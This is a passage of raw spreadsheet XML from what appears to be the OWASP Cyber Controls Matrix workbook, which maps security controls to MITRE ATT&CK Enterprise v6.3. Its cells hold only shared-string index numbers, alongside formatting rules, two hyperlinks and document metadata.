        <v>3735</v>
      </c>
      <c r="L753" s="41" t="s">
        <v>3604</v>
      </c>
    </row>
    <row r="754" spans="1:12" ht="60" x14ac:dyDescent="0.25">
      <c r="A754" s="19" t="s">
        <v>3605</v>
      </c>
      <c r="B754" s="10">
        <v>4</v>
      </c>
      <c r="C754" s="40" t="s">
        <v>2268</v>
      </c>
      <c r="D754" s="1" t="s">
        <v>3606</v>
      </c>
      <c r="E754" s="3" t="s">
        <v>3607</v>
      </c>
      <c r="J754" s="33" t="s">
        <v>3735</v>
      </c>
      <c r="L754" s="41" t="s">
        <v>3608</v>
      </c>
    </row>
    <row r="755" spans="1:12" ht="75" x14ac:dyDescent="0.25">
      <c r="A755" s="19" t="s">
        <v>3609</v>
      </c>
      <c r="B755" s="10">
        <v>4</v>
      </c>
      <c r="C755" s="40" t="s">
        <v>2268</v>
      </c>
      <c r="D755" s="1" t="s">
        <v>3610</v>
      </c>
      <c r="E755" s="3" t="s">
        <v>3611</v>
      </c>
      <c r="J755" s="33" t="s">
        <v>3735</v>
      </c>
      <c r="L755" s="41" t="s">
        <v>3612</v>
      </c>
    </row>
    <row r="756" spans="1:12" ht="45" x14ac:dyDescent="0.25">
      <c r="A756" s="19" t="s">
        <v>3613</v>
      </c>
      <c r="B756" s="10">
        <v>4</v>
      </c>
      <c r="C756" s="40" t="s">
        <v>2268</v>
      </c>
      <c r="D756" s="1" t="s">
        <v>3614</v>
      </c>
      <c r="E756" s="3" t="s">
        <v>3615</v>
      </c>
      <c r="J756" s="33" t="s">
        <v>3735</v>
      </c>
      <c r="L756" s="41" t="s">
        <v>3616</v>
      </c>
    </row>
    <row r="757" spans="1:12" ht="30" x14ac:dyDescent="0.25">
      <c r="A757" s="19" t="s">
        <v>3617</v>
      </c>
      <c r="B757" s="10">
        <v>4</v>
      </c>
      <c r="C757" s="40" t="s">
        <v>2268</v>
      </c>
      <c r="D757" s="1" t="s">
        <v>3618</v>
      </c>
      <c r="E757" s="3" t="s">
        <v>3619</v>
      </c>
      <c r="J757" s="33" t="s">
        <v>3735</v>
      </c>
      <c r="L757" s="41" t="s">
        <v>3620</v>
      </c>
    </row>
    <row r="758" spans="1:12" ht="45" x14ac:dyDescent="0.25">
      <c r="A758" s="19" t="s">
        <v>3621</v>
      </c>
      <c r="B758" s="10">
        <v>4</v>
      </c>
      <c r="C758" s="40" t="s">
        <v>2268</v>
      </c>
      <c r="D758" s="1" t="s">
        <v>3622</v>
      </c>
      <c r="E758" s="3" t="s">
        <v>3623</v>
      </c>
      <c r="J758" s="33" t="s">
        <v>3735</v>
      </c>
      <c r="L758" s="41" t="s">
        <v>3624</v>
      </c>
    </row>
    <row r="759" spans="1:12" ht="45" x14ac:dyDescent="0.25">
      <c r="A759" s="19" t="s">
        <v>3625</v>
      </c>
      <c r="B759" s="10">
        <v>4</v>
      </c>
      <c r="C759" s="40" t="s">
        <v>2268</v>
      </c>
      <c r="D759" s="1" t="s">
        <v>3626</v>
      </c>
      <c r="E759" s="3" t="s">
        <v>3627</v>
      </c>
      <c r="J759" s="33" t="s">
        <v>3735</v>
      </c>
      <c r="L759" s="41" t="s">
        <v>3628</v>
      </c>
    </row>
    <row r="760" spans="1:12" ht="105" x14ac:dyDescent="0.25">
      <c r="A760" s="19" t="s">
        <v>3629</v>
      </c>
      <c r="B760" s="10">
        <v>4</v>
      </c>
      <c r="C760" s="40" t="s">
        <v>2268</v>
      </c>
      <c r="D760" s="1" t="s">
        <v>3630</v>
      </c>
      <c r="E760" s="3" t="s">
        <v>3631</v>
      </c>
      <c r="J760" s="33" t="s">
        <v>3735</v>
      </c>
      <c r="L760" s="41" t="s">
        <v>3632</v>
      </c>
    </row>
    <row r="761" spans="1:12" ht="45" x14ac:dyDescent="0.25">
      <c r="A761" s="19" t="s">
        <v>3633</v>
      </c>
      <c r="B761" s="10">
        <v>4</v>
      </c>
      <c r="C761" s="40" t="s">
        <v>2268</v>
      </c>
      <c r="D761" s="1" t="s">
        <v>3634</v>
      </c>
      <c r="E761" s="3" t="s">
        <v>3635</v>
      </c>
      <c r="J761" s="33" t="s">
        <v>3735</v>
      </c>
      <c r="L761" s="41" t="s">
        <v>3636</v>
      </c>
    </row>
    <row r="762" spans="1:12" ht="30" x14ac:dyDescent="0.25">
      <c r="A762" s="19" t="s">
        <v>3637</v>
      </c>
      <c r="B762" s="10">
        <v>4</v>
      </c>
      <c r="C762" s="40" t="s">
        <v>2268</v>
      </c>
      <c r="D762" s="1" t="s">
        <v>3638</v>
      </c>
      <c r="E762" s="3" t="s">
        <v>3639</v>
      </c>
      <c r="J762" s="33" t="s">
        <v>3735</v>
      </c>
      <c r="L762" s="41" t="s">
        <v>3640</v>
      </c>
    </row>
    <row r="763" spans="1:12" ht="30" x14ac:dyDescent="0.25">
      <c r="A763" s="19" t="s">
        <v>3641</v>
      </c>
      <c r="B763" s="10">
        <v>4</v>
      </c>
      <c r="C763" s="40" t="s">
        <v>2268</v>
      </c>
      <c r="D763" s="1" t="s">
        <v>3642</v>
      </c>
      <c r="E763" s="3" t="s">
        <v>3643</v>
      </c>
      <c r="L763" s="41" t="s">
        <v>3644</v>
      </c>
    </row>
    <row r="764" spans="1:12" ht="45" x14ac:dyDescent="0.25">
      <c r="A764" s="19" t="s">
        <v>3645</v>
      </c>
      <c r="B764" s="10">
        <v>4</v>
      </c>
      <c r="C764" s="40" t="s">
        <v>2268</v>
      </c>
      <c r="D764" s="1" t="s">
        <v>3646</v>
      </c>
      <c r="E764" s="3" t="s">
        <v>3647</v>
      </c>
      <c r="L764" s="41" t="s">
        <v>3648</v>
      </c>
    </row>
    <row r="765" spans="1:12" ht="30" x14ac:dyDescent="0.25">
      <c r="A765" s="19" t="s">
        <v>3649</v>
      </c>
      <c r="B765" s="10">
        <v>4</v>
      </c>
      <c r="C765" s="40" t="s">
        <v>2268</v>
      </c>
      <c r="D765" s="1" t="s">
        <v>3650</v>
      </c>
      <c r="E765" s="3" t="s">
        <v>3651</v>
      </c>
      <c r="J765" s="33" t="s">
        <v>3735</v>
      </c>
      <c r="L765" s="41" t="s">
        <v>3652</v>
      </c>
    </row>
    <row r="766" spans="1:12" ht="60" x14ac:dyDescent="0.25">
      <c r="A766" s="19" t="s">
        <v>3653</v>
      </c>
      <c r="B766" s="10">
        <v>4</v>
      </c>
      <c r="C766" s="40" t="s">
        <v>2268</v>
      </c>
      <c r="D766" s="1" t="s">
        <v>3654</v>
      </c>
      <c r="E766" s="3" t="s">
        <v>3655</v>
      </c>
      <c r="J766" s="33" t="s">
        <v>3735</v>
      </c>
      <c r="L766" s="41" t="s">
        <v>3656</v>
      </c>
    </row>
    <row r="767" spans="1:12" ht="45" x14ac:dyDescent="0.25">
      <c r="A767" s="19" t="s">
        <v>3657</v>
      </c>
      <c r="B767" s="10">
        <v>4</v>
      </c>
      <c r="C767" s="40" t="s">
        <v>2268</v>
      </c>
      <c r="D767" s="1" t="s">
        <v>3658</v>
      </c>
      <c r="E767" s="3" t="s">
        <v>3659</v>
      </c>
      <c r="J767" s="33" t="s">
        <v>3760</v>
      </c>
      <c r="L767" s="41" t="s">
        <v>3660</v>
      </c>
    </row>
    <row r="768" spans="1:12" ht="105" x14ac:dyDescent="0.25">
      <c r="A768" s="19" t="s">
        <v>3661</v>
      </c>
      <c r="B768" s="10">
        <v>4</v>
      </c>
      <c r="C768" s="40" t="s">
        <v>2268</v>
      </c>
      <c r="D768" s="1" t="s">
        <v>3662</v>
      </c>
      <c r="E768" s="3" t="s">
        <v>3663</v>
      </c>
      <c r="J768" s="33" t="s">
        <v>33</v>
      </c>
      <c r="L768" s="41" t="s">
        <v>3664</v>
      </c>
    </row>
    <row r="769" spans="1:12" ht="45" x14ac:dyDescent="0.25">
      <c r="A769" s="19" t="s">
        <v>3665</v>
      </c>
      <c r="B769" s="10">
        <v>4</v>
      </c>
      <c r="C769" s="40" t="s">
        <v>2268</v>
      </c>
      <c r="D769" s="1" t="s">
        <v>3666</v>
      </c>
      <c r="E769" s="3" t="s">
        <v>3667</v>
      </c>
      <c r="J769" s="33" t="s">
        <v>3735</v>
      </c>
      <c r="L769" s="41" t="s">
        <v>3668</v>
      </c>
    </row>
    <row r="770" spans="1:12" ht="45" x14ac:dyDescent="0.25">
      <c r="A770" s="19" t="s">
        <v>3669</v>
      </c>
      <c r="B770" s="10">
        <v>4</v>
      </c>
      <c r="C770" s="40" t="s">
        <v>2268</v>
      </c>
      <c r="D770" s="1" t="s">
        <v>3670</v>
      </c>
      <c r="E770" s="3" t="s">
        <v>3671</v>
      </c>
      <c r="J770" s="33" t="s">
        <v>3735</v>
      </c>
      <c r="L770" s="41" t="s">
        <v>3672</v>
      </c>
    </row>
    <row r="771" spans="1:12" ht="60" x14ac:dyDescent="0.25">
      <c r="A771" s="19" t="s">
        <v>3673</v>
      </c>
      <c r="B771" s="10">
        <v>4</v>
      </c>
      <c r="C771" s="40" t="s">
        <v>2268</v>
      </c>
      <c r="D771" s="1" t="s">
        <v>3674</v>
      </c>
      <c r="E771" s="3" t="s">
        <v>3675</v>
      </c>
      <c r="J771" s="33" t="s">
        <v>3735</v>
      </c>
      <c r="L771" s="41" t="s">
        <v>3676</v>
      </c>
    </row>
    <row r="772" spans="1:12" ht="60" x14ac:dyDescent="0.25">
      <c r="A772" s="19" t="s">
        <v>3677</v>
      </c>
      <c r="B772" s="10">
        <v>4</v>
      </c>
      <c r="C772" s="40" t="s">
        <v>2268</v>
      </c>
      <c r="D772" s="1" t="s">
        <v>3678</v>
      </c>
      <c r="E772" s="3" t="s">
        <v>3679</v>
      </c>
      <c r="J772" s="33" t="s">
        <v>3735</v>
      </c>
      <c r="L772" s="41" t="s">
        <v>3680</v>
      </c>
    </row>
    <row r="773" spans="1:12" ht="60" x14ac:dyDescent="0.25">
      <c r="A773" s="19" t="s">
        <v>3681</v>
      </c>
      <c r="B773" s="10">
        <v>4</v>
      </c>
      <c r="C773" s="40" t="s">
        <v>2268</v>
      </c>
      <c r="D773" s="1" t="s">
        <v>3682</v>
      </c>
      <c r="E773" s="3" t="s">
        <v>3683</v>
      </c>
      <c r="J773" s="33" t="s">
        <v>3760</v>
      </c>
      <c r="L773" s="41" t="s">
        <v>3684</v>
      </c>
    </row>
    <row r="774" spans="1:12" ht="45" x14ac:dyDescent="0.25">
      <c r="A774" s="19" t="s">
        <v>3685</v>
      </c>
      <c r="B774" s="10">
        <v>4</v>
      </c>
      <c r="C774" s="40" t="s">
        <v>2268</v>
      </c>
      <c r="D774" s="1" t="s">
        <v>3686</v>
      </c>
      <c r="E774" s="3" t="s">
        <v>3687</v>
      </c>
      <c r="J774" s="33" t="s">
        <v>3737</v>
      </c>
      <c r="L774" s="41" t="s">
        <v>3688</v>
      </c>
    </row>
    <row r="775" spans="1:12" ht="30" x14ac:dyDescent="0.25">
      <c r="A775" s="19" t="s">
        <v>3689</v>
      </c>
      <c r="B775" s="10">
        <v>4</v>
      </c>
      <c r="C775" s="40" t="s">
        <v>2268</v>
      </c>
      <c r="D775" s="1" t="s">
        <v>3690</v>
      </c>
      <c r="E775" s="3" t="s">
        <v>3691</v>
      </c>
      <c r="J775" s="33" t="s">
        <v>3735</v>
      </c>
      <c r="L775" s="41" t="s">
        <v>3692</v>
      </c>
    </row>
    <row r="776" spans="1:12" ht="60" x14ac:dyDescent="0.25">
      <c r="A776" s="19" t="s">
        <v>3693</v>
      </c>
      <c r="B776" s="10">
        <v>4</v>
      </c>
      <c r="C776" s="40" t="s">
        <v>2268</v>
      </c>
      <c r="D776" s="1" t="s">
        <v>2260</v>
      </c>
      <c r="E776" s="3" t="s">
        <v>3694</v>
      </c>
      <c r="J776" s="33" t="s">
        <v>3735</v>
      </c>
      <c r="L776" s="41" t="s">
        <v>3695</v>
      </c>
    </row>
    <row r="777" spans="1:12" ht="45" x14ac:dyDescent="0.25">
      <c r="A777" s="19" t="s">
        <v>3696</v>
      </c>
      <c r="B777" s="10">
        <v>4</v>
      </c>
      <c r="C777" s="40" t="s">
        <v>2268</v>
      </c>
      <c r="D777" s="1" t="s">
        <v>3697</v>
      </c>
      <c r="E777" s="3" t="s">
        <v>3698</v>
      </c>
      <c r="J777" s="33" t="s">
        <v>3760</v>
      </c>
      <c r="L777" s="41" t="s">
        <v>3699</v>
      </c>
    </row>
    <row r="778" spans="1:12" ht="60" x14ac:dyDescent="0.25">
      <c r="A778" s="19" t="s">
        <v>3700</v>
      </c>
      <c r="B778" s="10">
        <v>4</v>
      </c>
      <c r="C778" s="40" t="s">
        <v>2268</v>
      </c>
      <c r="D778" s="1" t="s">
        <v>3701</v>
      </c>
      <c r="E778" s="3" t="s">
        <v>3702</v>
      </c>
      <c r="J778" s="33" t="s">
        <v>3735</v>
      </c>
      <c r="L778" s="41" t="s">
        <v>3703</v>
      </c>
    </row>
    <row r="779" spans="1:12" ht="60" x14ac:dyDescent="0.25">
      <c r="A779" s="19" t="s">
        <v>3704</v>
      </c>
      <c r="B779" s="10">
        <v>4</v>
      </c>
      <c r="C779" s="40" t="s">
        <v>2268</v>
      </c>
      <c r="D779" s="1" t="s">
        <v>3705</v>
      </c>
      <c r="E779" s="3" t="s">
        <v>3706</v>
      </c>
      <c r="J779" s="33" t="s">
        <v>3707</v>
      </c>
      <c r="L779" s="41" t="s">
        <v>3708</v>
      </c>
    </row>
    <row r="780" spans="1:12" ht="45" x14ac:dyDescent="0.25">
      <c r="A780" s="19" t="s">
        <v>3709</v>
      </c>
      <c r="B780" s="10">
        <v>4</v>
      </c>
      <c r="C780" s="40" t="s">
        <v>2268</v>
      </c>
      <c r="D780" s="1" t="s">
        <v>3710</v>
      </c>
      <c r="E780" s="3" t="s">
        <v>3711</v>
      </c>
      <c r="J780" s="33" t="s">
        <v>3735</v>
      </c>
      <c r="L780" s="41" t="s">
        <v>3712</v>
      </c>
    </row>
    <row r="781" spans="1:12" ht="45" x14ac:dyDescent="0.25">
      <c r="A781" s="19" t="s">
        <v>3713</v>
      </c>
      <c r="B781" s="10">
        <v>4</v>
      </c>
      <c r="C781" s="40" t="s">
        <v>2268</v>
      </c>
      <c r="D781" s="1" t="s">
        <v>3714</v>
      </c>
      <c r="E781" s="3" t="s">
        <v>3715</v>
      </c>
      <c r="J781" s="33" t="s">
        <v>3735</v>
      </c>
      <c r="L781" s="41" t="s">
        <v>3716</v>
      </c>
    </row>
    <row r="782" spans="1:12" ht="60" x14ac:dyDescent="0.25">
      <c r="A782" s="19" t="s">
        <v>3717</v>
      </c>
      <c r="B782" s="10">
        <v>4</v>
      </c>
      <c r="C782" s="40" t="s">
        <v>2268</v>
      </c>
      <c r="D782" s="1" t="s">
        <v>3718</v>
      </c>
      <c r="E782" s="3" t="s">
        <v>3719</v>
      </c>
      <c r="J782" s="33" t="s">
        <v>3735</v>
      </c>
      <c r="L782" s="41" t="s">
        <v>3720</v>
      </c>
    </row>
    <row r="783" spans="1:12" ht="30" x14ac:dyDescent="0.25">
      <c r="A783" s="19" t="s">
        <v>3721</v>
      </c>
      <c r="B783" s="10">
        <v>4</v>
      </c>
      <c r="C783" s="40" t="s">
        <v>2268</v>
      </c>
      <c r="D783" s="1" t="s">
        <v>3722</v>
      </c>
      <c r="E783" s="3" t="s">
        <v>3723</v>
      </c>
      <c r="J783" s="33" t="s">
        <v>3735</v>
      </c>
      <c r="L783" s="41" t="s">
        <v>3724</v>
      </c>
    </row>
  </sheetData>
  <autoFilter ref="A1:L783"/>
  <conditionalFormatting sqref="A1:L1048576">
    <cfRule type="expression" dxfId="3" priority="5">
      <formula>AND($A1&gt;0,$B1=0,ROW()&gt;2)</formula>
    </cfRule>
    <cfRule type="expression" dxfId="2" priority="6">
      <formula>IF(ROW()&gt;2,MOD(ROW(),2)=0,FALSE)</formula>
    </cfRule>
    <cfRule type="expression" dxfId="1" priority="7">
      <formula>AND($B1&gt;1,ROW()&gt;2)</formula>
    </cfRule>
    <cfRule type="expression" dxfId="0" priority="8">
      <formula>AND(#REF!&gt;0,ROW()&gt;2)</formula>
    </cfRule>
  </conditionalFormatting>
  <hyperlinks>
    <hyperlink ref="E3" r:id="rId1" display="https://cybercontrolsmatrix.com/"/>
    <hyperlink ref="L3" r:id="rId2" display="https://attack.mitre.org/"/>
  </hyperlinks>
  <pageMargins left="0.5" right="0.5" top="0.5" bottom="0.5" header="0.3" footer="0.3"/>
  <pageSetup scale="35" fitToHeight="999" orientation="landscape" r:id="rId3"/>
  <headerFooter>
    <oddHeader>&amp;COCCM Control Set for MITRE ATTK Enterprise Matrix v6.3 (20191024)</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MITRE ATT&amp;CK Enterprise v6.3</vt:lpstr>
      <vt:lpstr>'MITRE ATT&amp;CK Enterprise v6.3'!Print_Titles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OCCM Control Set</dc:title>
  <dc:creator>Eric J. Bragger</dc:creator>
  <cp:keywords>OWASP Cyber Controls Matrix (OCCM);OCCM;Controls;Control Set;Framework;Matrix;NIST;800-53</cp:keywords>
  <cp:lastModifiedBy>Main</cp:lastModifiedBy>
  <cp:lastPrinted>2020-06-12T03:13:51Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-05-31T19:21:43Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-06-12T04:14:34Z</dcterms:modified>
  <cp:category>OCCM;Control Set;Controls;Framework;Matrix</cp:category>
</cp:coreProperties>
</file>